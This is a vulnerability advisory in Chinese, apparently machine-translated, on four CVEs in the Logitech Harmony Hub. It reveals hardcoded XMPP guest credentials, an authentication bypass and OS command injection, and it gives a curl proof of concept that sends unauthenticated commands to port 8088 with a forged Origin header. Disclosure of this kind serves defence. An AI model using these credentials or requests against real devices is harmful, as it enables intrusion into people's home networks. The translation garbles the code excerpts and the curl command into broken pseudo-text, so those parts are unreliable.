(R2)罗技和谐中心多个漏洞

成立在罗技和谐中心发现了多个漏洞。

cve - 2018 - 15720: XMPP默认账户

XMPP服务器包含两个无证默认账户。任何正常的账户有相同的特权身份验证的用户。

文件:luaworks /任务/ connectserver / / xmppconnection.lua.out核心。lua函数:processAuthenticate =函数(自我,str)——num: 0 _12 upvalues: AUTH_GUEST AUTH_YES AUTH_NO如果str = =“AGd1ZXN0AGd1ZXN0 str = =“Z3Vlc3QAZ3Vlc3QA”然后自我。clientJid = "客人"自我。验证= AUTH_GUEST

cve - 2018 - 15721: XMPP认证绕过

一个精心制作的XMPP可以绕过身份验证请求。当一个请求不包含一个XMPP办公自动化元素初始化标识变量,它仍未初始化。验证函数将返回传递给它的任何用户名。

文件:luaworks /任务/ connectserver / / xmppconnection.lua.out核心。lua函数:processAuthenticate =函数(自我,str)…如果自我:验证(str),那么自我。clientJid = " 1111 "自我。验证= AUTH_YES……验证=函数(自我、用户名)——num: 0 _11如果没有自我。身份然后返回用户名…processHlapiRequest = function(自我,cmd,参数)……如果(response.data)。然后自我身份。= (response.data) .identity身份

cve - 2018 - 15722:远程服务器操作系统命令注入

在引导时,设备时间同步请求到一个远程服务器。服务器的响应最终用于通过Lua os操作系统shell命令。执行函数timemanager.lua。远程攻击者能够注入由于缺乏验证操作系统命令。

cve - 2018 - 15723: HTTP请求的应用程序命令注入

精心制作的HTTP请求允许未经身份验证的远程攻击者执行应用程序级别的命令(如。harmony.system ?系统信息)。HTTP POST请求起源与一个伪造的HTTP端口8088头可以隐式信任的设备。一个概念证明如下:

curl - d”{\“cmd \”, \“harmony.system吗?系统信息\“}”- h”产地:.myharmony.com”- h“application / json - type:”“http://192.168.0.176:8088”{“味精”:“OK”,“数据”:{“unit_id”:“20170121214639 - 000143”,“fw_type”:“0 x00”、“fw_ver”:“4.15.193”、“弓”:“0 x11”、“hw_ver”:“0 x00”、“usb_product_id”:“0 xc129”,“皮肤”:“106”,“usb_vendor_id”:“0 x046d”},“代码”:" 200 "}